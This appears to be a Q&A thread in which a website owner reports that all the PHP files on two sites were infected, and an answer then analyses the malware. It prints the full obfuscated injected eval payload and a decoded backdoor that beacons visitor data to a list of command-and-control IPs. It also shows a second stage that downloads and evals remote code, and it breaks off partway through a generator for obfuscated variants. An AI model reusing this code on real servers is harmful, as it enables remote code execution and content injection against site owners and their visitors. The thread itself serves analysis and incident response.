Is my site hacked?
I might be insane to write this here, but right now I'm just scared. IPage has 2 websites.
All PHP pages on both of my sites were changed early in the morning around 9am and they all have the following prefix
<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZFJlbHBFVGsxaGJYTXhWMWN4YzAxSFRqVk9WM0JwVFdwQ2NGUjZUa3RpUjFKSlZtNXNhV0ZWUm5KWmJHTTFUVWRHU0ZadWJGQk5la1l5VjFkM05XVnRVa2hTYm14clVUSmtjRmxxVGtOaFIwcDBaRWhDU21GWGN6TlhiVFZYWkZacmVsVnVRbWxOYWxKdVYxWmtiMkpYVWxoVmJURnBVakZ2TWxkclpHOWlWMFpKVkZjNVMxTkZTbTlUTVdoNllUSktXRkp1VWxwVk1FVTFVMVZXYTJKSFVrWk5WMmhwVmpCV2RsTXhVbnBoTVhCMFlraE9ZVlV3UlRWVFZXaFhaVmRLU0ZadVZscE5hbXh5VjJ4T2IxcHNaM2RYYTNCVlVsWmFiVmRJYkhKT01rWllWMWRrVEZJeWVEWlpla3BYVFVWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVFtOVZSbFY0VlZkc1dWVXlkSGRhV0d4VFlqSkplbFJxUWtwU1JFSnVVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhkRzlXVmxwSFVXMWFWRkpVYkZWV2EwNUxXa1U0ZWsxSFpHRldNMmcyVjJ4T1EwNHdjRWhoU0ZwcVRURkdibFZHVGtKaFZXeHhaRVJzYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3VkZWc1ZYaFZSbHBHVm0xYVVsWldTa1pXVjJ4TFdrVjBWR0pFWkV0U01uZ3pVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4elUydGFWVlpVYkZaVmJGazFVV3hLUmxWc1RrcGlSRUV6V214T1EySkhTa2xVYlhoS1UwaE9jbGxXYUVKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFRWbHBIVld4R1dVMVZjRWRWYlhSWFZURktWMU5YYkZsVk1uUjNXbGhzVTJWV2NGaFhWMlJSVlRCSmVGa3lNVFJpUjBwMFZHNWFZVkl4Vm5aVGExazFWa1pLVjFOc1pGTldhM0JwVTFkMGIxWldXa2RSYlZwV1lURmFTRlZzV2t0U2JGWndVMjFTVEZaSVVUVlRWV1JYWXpKTmVWWlhaR3hsVmtvMVYyeGtXbG94UWxSUlYyeEtZVzVSTlZsV1pGcGFNSFJJWWtod2FrMXNXWGRUTUU1VFdteFZkMVpzVGxkaE1WcFVWak5zUzFOV1drZFZiRVpaVFZaYVZWVnNXa3RhYkVaV1drVmFWV0pHUm5CWFJrNXlZMGRXTlZWcVJscFZNRVUxVTFWb1YyVlhTa2hXYmxaYVRXcHNjbGRzVG05bGJWSkpVMnBDYVUxdWFESmFSRXBYWlZWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVJsZFdSa3BYVTIxYVVsWlhVa2RXUjNoU1lWWm9WR0V6UWxCTmVrSnVWMnhrTkdWc2NGUlJhbVJMVTBaYWIxTlZVWGRhTUd4d1UxUmtiVll5ZUhSVFZVNXZZMGROZWxSdGVHdFJNbVJ5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlpXV2xkU2JGWnpZa2RhVmsxV1NsUlZNVlV4VTBWc2MwMUlRa3hYU0U1eVdURm9UbG94UWxSUmFrWnFZbGhvYzFsdE1VOWtiSEJJVmxjNVMxSnFiRlZWYkZwTFZqRktWMU50U2twaVJWcFhWV3hhUzFkc1ozaFViRlpXWVRKNFVGVnViRXRhUlhSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdWFHcGxWVVUxVTFWT1NtRlZPSHBOUjNSclYwVndlbGRJY0VKYU1VSlVVVmRzYUZOR1NYZFpNRkoyWkd0NE5WTlhaRTFoVlVaeVdUQmtSazR3Y0VsV2JteHBVbXBvTkZOVlVYZGFNR3h3VDFoR1lWWXhTbmRVUnpWRFlqSk9SVTlVU21GWFJYQTJXVlpqTldSV1FsVlJWRlpRVmtWV2RGbHNZelZOUjBaSVZtNXNVVlV3Ykc1VVIyeFRaRVpzV0UxWGFFcFJlbEp1VTFkc1lXSlhSbGhsUjNoUlZUQnNibFJIYkVKaE1YQjBZa2hPWVZVd1JqRlRWVTVLWWxkR1NFOVljR3RTUkVKd1UxVk5NRm93Y0VoaFNGcHFUVEZHYmxSSGJFSmhWWEIwWWtoa1VWVXdiRzVVUjJ4Q1lUSkdXVkZYWkUxaFZVWndVMjAxUzJKR2NIRk5SMnhLVVhwU2JsTnJhRXRpUm5Cd1VWaFdTbEV3YkhSYVJtUkdUMVZzY0ZGWVZrdFRSbHB2VTFWTk1Gb3diSEJYYm1ocVpXcENjRk5WVFRCYU1IQkpVbTV3VUdWV1NYZFpNalZ5V2pGQ1ZGRnFRbXBpYkZwelZIcEtjMkpWZEVSUmJURnJWbnBXY1ZwRlpITmtiVXB6VDFkNGJGSXllRFphUldoT1lqQnNkRlJxUm1waVdHaHRXVlpqTVdOSFVrUlRXRUpLVVRKM00xTnJaRTlpTUd4RlRVZGtXazB4V2pWWmExazFZMGRLZEdKRVFreFJNVWw0V1RJeE5GcHJNVVJSV0ZaS1VURkplRmt5TVRSYWF6RlVZWHBrV2sweFdqVlphMWsxWld4d1dWVnVXbXBUUmtaMlUydGtUMkl3ZUVSUmExSlhWbXR3VGxaRVJrTldWbWQ0VTJ0YVYxSnNXbFJXUjNoVFZURkdWazVXVWxOaE1WcFVWRVZPUW1WRmRGVmtSM0JyVjBWd2VsZEVUazlpUjFKSVQxaGthMUV5WkhKWFZFcHVZekJzUmxSc1dsWmhNMmhSVmxWYVUxcHNXa1ppUlRWVFZsUnNWMVpyVGpOYU1ERTFZWHBrUzFOR1ducGFSVTVDVDFWc1NWVnViR2hXZWtKMlYxUk9WMlZYU2tkUFYzaHNVakZhY1ZNd1RsTmhiVVpFWVROQ1VHVldTWGRaTWpWeVdqRkNWRkZ0TVZwV00yZzJWMnhTTUU5VmJFaGlSekZLVVRKa2RsbFdZekZqUm1kNVdrZDRhMUV5WkhCWFZtUTBZekpKZWxwSFdtdFhSWEI2VjBSS1lXUnRUa2hXYmxaS1lWZDBkMU5WVGxwaVZXeEVWV3BDYW1KdGRIZFRWV2g2WVRKU1dHVkVRa3BTUkVKdVdrVm9TMk5IU2xSaFJVWmhZbGQ0ZWxkc1dUVmliSEJaVlcxYVdrMXFiREZhUldSWFpGZFNTVlJYT1V0VFJsbzFXV3RaTkdRd2JFUk9SMlJMVTBaYU5WbHJXVFJsUlhSVVlYcGtTMU5HU2pWYVZrNUNUMVZzU0ZkdGFHbFRSVFZ6VkhwTmVHTkdjSEJhTW5SclUwVnZNVk14YUhwaE1YQjFVVmRrVVZVd1NuUlpla2sxWVcxRmVVOVlaR0ZXZWxKMlUydG9RMkZGZUVSUlZGSk9VVE5rYmxOclpGZGxWMDUwVGxoYVRWRXdSbkpYYkdoTFpWZE5lbFZ1YkUxUk1FWTJWRlZPY2s0eVJsaFhWMlJNVVRGS2RGa3dUbkphTWxZMVZXNWFhMWRHUm01VlJrNUNZVlpKZDFac1ZrcFJNVWw0V1RJeE5GcHJNVlJSYTJ4WFVteEtVbFJJY0Vaa1ZURkhaVWhzV1ZKNlVuQlVNMnhUWkcxU1dWVlhaRTFoYWtKdVUxZDBiMlJ0VFhwVlZGcEtVVEZLTTFkV1dqUmxWbWhJVGtkc1VHVldTakphUm1oU1dqQjRjVTFIWkVwaE1EVXlXVzB3TVdKR2EzcFZia0pwVFdwUk1sTlZWazlqTWtsNlZHMTRXVk5GY0dwWmJYZzBaVlpvU0U1SGJGQk5iRzk2V1RJeGMwMUdjRlJhTW5SaFltdEdlbE5WVGxOa2JWSlpWVmhDVUdWV1NqVlhiR2hTV2pGQ1ZGRlhiRXBoYmxGNldWVmtjMk14Y0ZSUlZ6bEtWakZ3YzFscVNscGlNSEJJVjI1a1RGVXlkRzVhV0d4VFpWWndXVlZYWkVwUmVsRTFVMVZPUTJKV2IzbFdha0pxWlZka2NsZHROVUpqTUd4RlVsaHNVRkV5Y3pOYWJHUmhZVzFLU0U5WWNHRlZNbVJ5VjIwMVFtTkZPVFZWYWtacFUwWkdibFZHVGtOTlIwNTBZa2hTVEZORk5IaFhWelZQVFVkT2NGb3lkR3BpVmxsM1ZFVk9RMlZ0VWtsVGJtUnBUVEF4ZGxOcmFFdGlSMUpFWkRKa1NtSklhRFZYUldNeFdUSk9jMlZJVmtwaFYzUnVVek5zUWsxRmRGUmhlbVJ0VjBSQ2JsTlZaSE5pVld4RVlVaHdhMU5GY0ROWmFrNU9ZakJ3U1ZadVRtdFJNMlJ3VjJ4b1lXRkhTa1JUV0VKS1VUQlZOVlZHVGtOaVZteFlaVWh3WVZVeWR6TlRhMmgyV2pGQ1ZGRnVjR3RUUlhCM1dUQm9UMk14YkZsVWJUbGhWMFV4ZGxsNlRsTmxWbWQ2VTIxNGFsSXphRzlYVkVwV1lqQnNkRlpxU2xwV00yUndWRVZPU21GVmVFUlZha1pwVTBaR2QxTXhVbnBhTVhCWlYyMW9hVkV5WkhKYVYyeHlUakJzU0ZacVVtaFhSa1oyVXpGU01FOVhSbGhYVjJSTVUwVTBkMWt5TlVOa2JVNDFXakowYTFZelozZFVSVTVMWWtac2RFNVhhRXBoVjNSdVUxWlJkMDlWYkVoWGJXaHBVMFUxYzFNeGFIcGhNV2Q0Vkd0YVZtSkdjRWRXVjNoNllWWnZlVTlZV21GUk1IQnJVMVZSZDFveVRYcFZibXhaVFRCd2Mxa3daRFJoUm10NVZsYzVTbUpXV25CWmJURkdZVlY0UkZOWGJFMVJNVWw0V1d0b1VtTkZPSHBUYlhoclUwWmFOVmx0YkVOTlIwNTFWbTE0VUUxNlJuTlphMmhQWWtWc1NXUkliR0ZYUmtsNFdUSXdNRm94Y0hSU2JrNXFUV3hWTTFwc1ozZGhNWEIwVW1wQ2FGSXhXalZVVjNnd1drVnNSVTFIWkVwaGJVMHdWRWR3VWsxcmVIRlNWRTVPWlZSU05GUnJUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cwVkc1d1dtUlZPVlJPU0d4T1ZrZGtNVlJXVW5KbFJXeHhZekowWVdKVldYZFpWV1JYWlZVeGMyUkhVa3BTUkVKdVUxZHdjbVZGZUhGVFdHeFFVWHBTTkZSc1VsSmtWVEZ4VmxSQ1NtRnVUbkpYYlRGSFRVZEdTRlp1YkU1aVNGSnJVMVZSZDFvd2JIRlplazVOWVcxa05GUkhjRXBOUlRGVVRraHNUMVpGTVhCVU0yeFRZbFpzV1ZWdE9XRlhSV3cxVm5wRmQxb3hRbFJSVjJ4T1ZrZGpkMVJIY0c1bFZYaHhVbGhvVDJWVVVqUlVWbEpDWVZVNU5WVnRNVnBYUmtwMlYyeG9TbVZXWTNoTlIyUlJWVEJHY0ZSclVscGtWVFZFVGtoc1RsSkZiREZVTVZKT1lWVTVOVlZ0TVZwWFJrcDJWMnhvU21WV1kzaE5SMlJSVlRCR2NGUnJVbHBrVlRGeFZWUldUV0ZzVlRCVVIzQkdaV3MxVkZOVVpFdFNNWEJ2V2tWa2IySkhUbkZUYlVwWlZUQkZOVk5WVGtwbFJUVTJWMWhXVUZWNlVqVlVhMUpHWkZVeFZWWllaRXBoYms1eVYyMHhSMDFIUmtoV2JteE9Za2hTYTFOVlVYZGFNR3h4VlZSS1RXRnJNSHBVUjNCR1RXczVWRTVFUms5aFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxUkNUMkZVVWpaVVZVMHdUVVV4VkU1RVZsQlZNR3N6VTJ0a1lXRkhVa2hoUjNocVlXdHdhVmRHVGtKUFZXeEVVMVJXVDFGNlVqVlVhMUpLWkZVeGNWWlVSazFoYXpCNFUxZHdlbUV4Y0hSU2FrSm9VakZhTlZSWGVEQmFSV3hGVFVka1NtRnJWWHBVTUUwd1pVVTFjVk5ZVms1V1JXc3hWRWR3U21WVk1UVlRWR1JMVWpGd2IxcEZaRzlpUjA1eFUyMUtXVlV3UlRWVFZVNUtUVEE1UkU1RVFrOWxWRkkwVkRCU1VtUlZNVFpVVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeE5sSllWazVXUjJOM1ZFZHdTbVZyTlVST1JGWlBZVlZyTTFsNlNtOU5WbkIwVjI1T1lWVXlaSEpYYlRGSFRVZEdTRlp1YkU1aFYzTXpWMjB3TldWV2NGaFNiWEJvVVRKa2NsZHRNVWROUjBaSVZtNXNUbUZWU205Wk0yeENZVEpTV1ZOWVFteE5iWGgwVTFWT2Jsb3hiRmhoUnpGclZqRktkRmxyWkdGT2JIQklZVWN4YUZORk1YWlRhMmhYWlZWMFZGRllRa3BUU0U1dVYxYzFTMkpHYkZoak1tUlFUWHBGTlZwc1JUbFFVMGx3UzFSelp5SXBLVHNnIikpOyA=";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>
I tried to get iPage support and they have no idea what happened. They just created a support ticket for me, which will be reviewed within 48 hours!
UPDATE
Got an email about the hack
From: Poor Victim hahahaha@gmail.com
Message: Why is this code on my server? why are you hacking my files ??? this code points to you !!! Prepare for trial
if (! function_exists ("GetMama")) {function mod_con ($ buf) {str_ireplace ("," ", $ buf, $ cnt_h); if ($ cnt_h == 1) {$ buf = str_ireplace (", "" . stripslashes ($ _ SERVER ["good"]), $ buf); return $ buE; } str_ireplace ("," ", $ buf, $ cnt_h), if ($ cnt_h == 1) {$ buf = str_ireplace (" ", stripslashes ($ _ SERVER [" good "])." ", $ buE) ; return $ buf;} return $ buf;} function opanki ($ buf) {$ gz_e = false; $ h_l = headers_list (); if (in_array ("Content-Encoding: gzip", $ h_l)) {$ gz_e = true;} if ($ gz_e) {$ tmpfname = tempnam ("/ tmp", "FOO"); file_put_contents ($ tmpfname, $ buf); $ zd = gzopen ($ tmpfname, "r"); $ contents = gzread ($ zd, 10000000); $ contents = mod_con ($ contents); gzclose ($ zd);unlink ($ tmpfname); $ contents = gzencode ($ contents); } else {$ contents = mod_con ($ buf); } $ len = strlen ($ contents); header ("Content-Length:". $ len); return ($ contents); } GetMama () function {$ mother = "www.99bits.com"; return $ mother; } ob_start ("opanki"); function ahfudflfzdhfhs ($ pa) {$ mama = GetMama (); $ file = urlencode (FILE); if (isset ($ _ SERVER ["HTTP_HOST"])) {$ host = $ _SERVER ["HTTP_HOST"]; } else {$ host = ""; } if (isset ($ _ SERVER ["REMOTE_ADDR"])) {$ ip = $ _SERVER ["REMOTE_ADDR"]; } else {$ ip = ""; } if (isset ($ _ SERVER ["HTTP_REFERER"])) {$ ref = UrlEncode ($ _ SERVER ["HTTP_REFERER"]); } else {$ ref = ""; } if (isset ($ _ SERVER ["HTTP_USER_AGENT"])) {$ ua = UrlEncode (strtolower ($ _ SERVER ["HTTP_USER_AGENT"])); } else {$ ua = ""; } if (isset ($ _ SERVER ["QUERY_STRING"])) {$ qs = UrlEncode ($ _ SERVER ["QUERY_STRING"]); } else {$ qs = ""; } $ url_0 = "http: //". $ pa; $ url_1 = "/jedi.php?version=0991&mother=". $ mom. "& file =". $ file. "& host = ". $ host." & ip = ". $ ip." & ref = ". $ ref." & ua = ". $ ua." & qs = ". $ qs; $ try = true if (function_exists (" curl_init ")) {$ ch = curl_init ($ url_0. $ url_1); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ ch, CURLOPT_TIMEOUT, 3); $ ult = trim (curl_exec ($ ch)); $ try = false;} if ((ini_get ("allow_url_fopen")) && $ try) {$ ult = trim (@file_get_contents ($ url_0. $ url_1)); $ try = false;} If ($ try) {$ fp = fsockopen ($ pa, 80, $ errno, $ errstr, 30), if ($ fp) {$ out = "GET $ url_1 HTTP / 1.0 \ r \ n "; $ out. =" Host: $ pa \ r \ n "; $ out. =" Connection: Close \ r \ n \ r \ n "; fwrite ($ fp, $ out); $ ret = ""; while (! Feof ($ fp)) {$ ret. = fgets ($ fp, 128);} fclose ($ fp);$ ult = trim (substr ($ ret, strpos ($ ret, "\ r \ n \ r \ n") + 4)); }} if (strpos ($ ult, "eval")! == false) {$ z = stripslashes (str_replace ("eval", "", $ ult)); Eval ($ r); Output(); } if (strpos ($ ult, "ebna")! == false) {$ _SERVER ["good"] = str_replace ("ebna", "", $ ult); return true; } else {return false; }} $ father2 [] = "78.46.173.14"; $ father2 [] = "176.9.218.191"; $ father2 [] = "91.228.154.254"; $ father2 [] = "77.81.241.253"; $ father2 [] = "184.82.117.110"; $ father2 [] = "46.4.202.93"; $ father2 [] = "46.249.58.135", $ father2 [] = "176.9.241.150"; $ father2 [] = "46.37.169.56"; $ father2 [] = "46.30.41.99"; $ father2 [] = "94.242.255.35";$ father2 [] = "178.162.129.223"; $ father2 [] = "78.47.184.33"; $ father2 [] = "31.184.234.96"; shuffle ($ father2); foreach ($ father2 as $ ur) {if (ahfudflfzdhfhs ($ ur)) {break; }}}
Sent from (ip address): 64.118.163.18 (64.118.163.18) Date / Time: April 9, 2012 7:15 pm Based on (referent): http://www.99bits.com/contact-us/ Usage ( user agent): Mozilla / 5.0 (Macintosh, Intel Mac OS X 10_7_3) AppleWebKit / 535.19 (KHTML like Gecko) Chrome / 18.0.1025.151 Safari / 535.19
Thanks to each of you for all the help and knowledge. For some strange and unknown reason, my blog was targeting this hack attempt. I closed the blog for a while until I can clean all files (since all my PHP files are infected).
source to share
In its current form, the script has the following command and control servers ("c & c"):
$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";
The script will randomize their order on each run. Then it tries to send a GET request containing these variables
$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__
to the first c & c server, if the response does not contain eval
or ebna
(or the server is down) it tries to use the next c & c server, etc.
If the server returns c & c: ebna <somestring>
, <somestring>
will be placed in the body tag of your website. This way a hacker can insert arbitrary html / js code.
Otherwise, when the server c & c returns eval <somestring>
, <somestring>
eval () will be passed. This way a hacker can even execute arbitrary php code.
I was able to get the server c & c to return an eval response by simply passing all the url parameters like : http://<server-ip>/jedi.php
, here is the answer:
eval $try = true;
if (function_exists("curl_init")) {
$ch = curl_init('http://2brewers.com/99.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
$ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
$try = false;
}
if ($try) {
$fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET /99.txt HTTP/1.0\r\n";
$out. = "Host: 2brewers.com\r\n";
$out. = "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = '';
while (!feof($fp)) {
$ret. = fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);
which loads and executes http://2brewers.com/99.txt
, which looks like this:
function get_file_extension($file_name) {
return substr(strrchr($file_name, '.'), 1);
}
function pass_gen($dol) {
$source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$source[1] = "0123456789";
$length = rand(5, 50);
$passwordlen = intval($length) - 1;
$use = implode("", $source);
$max_num = strlen($use) - 1;
$rp = '';
for ($i = 0; $i < $passwordlen; $i++) {
$x = rand(0, $max_num);
$rp. = $use[$x];
}
if ($dol) {
return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
} else {
return $source[0][rand(0, strlen($source[0]) - 1)].$rp;
}
}
function GetMass($text, $code, $massname) {
$a = str_split($text);
foreach($a as $b) {
$evmas[] = ord($b) + $code;
}
$z = $massname."= array('".implode("','", $evmas)."');";
return $z;
}
function Codee($code) {
$coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';
$f1 = pass_gen(false);
$coo = str_replace('F1', $f1, $coo);
$v1 = pass_gen(true);
$coo = str_replace('$v1', $v1, $coo);
$v2 = pass_gen(true);
$coo = str_replace('$v2', $v2, $coo);
$v3 = pass_gen(true);
$coo = str_replace('$v3', $v3, $coo);
$v4 = pass_gen(true);
$coo = str_replace('$v4', $v4, $coo);
$v5 = pass_gen(true);
$coo = str_replace('$v5', $v5, $coo);
$v6 = pass_gen(true);
$coo = str_replace('$v6', $v6, $coo);
$v7 = pass_gen(true);
$coo = str_replace('$v7', $v7, $coo);
$v8 = pass_gen(true);
$coo = str_replace('$v8', $v8, $coo);
$v9 = pass_gen(true);
$coo = str_replace('$v9', $v9, $coo);
$v0 = pass_gen(true);
$coo = str_replace('$v0', $v0, $coo);
$mas1 = pass_gen(true);
$coo = str_replace('$mas1', $mas1, $coo);
$mas2 = pass_gen(true);
$coo = str_replace('$mas2', $mas2, $coo);
$mas3 = pass_gen(true);
$coo = str_replace('$mas3', $mas3, $coo);
$code1 = rand(1000, 10000);
$coo = str_replace('$code1', $code1, $coo);
$code2 = rand(1000, 10000);
$coo = str_replace('$code2', $code2, $coo);
$code3 = rand(1000, 10000);
$coo = str_replace('$code3', $code3, $coo);
for ($i = 0; $i < 3; $i++) {
